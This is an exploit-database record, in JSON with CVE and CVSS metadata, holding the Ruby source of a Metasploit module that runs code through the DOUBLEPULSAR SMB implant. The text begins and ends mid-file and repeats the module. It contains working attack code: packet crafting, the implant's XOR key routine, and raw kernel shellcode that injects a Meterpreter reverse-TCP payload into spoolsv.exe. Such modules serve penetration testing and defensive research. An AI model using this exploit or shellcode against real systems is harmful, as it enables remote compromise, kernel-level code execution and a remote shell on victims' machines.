pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-23] #"}, "lastseen": "2021-09-22T22:14:58", "differentElements": ["sourceData"], "edition": 22}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "e0a5a559c8bc693711ca445932038bbc", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-24T00:15:39", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", 
"EDB-ID:43970", "EDB-ID:41987", "EDB-ID:42030"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96705", "SMNTC-96709", "SMNTC-96704", "SMNTC-96707", "SMNTC-96703"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", 
"TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-24T00:15:39", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-24T00:15:39", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module 
requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => 
MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n 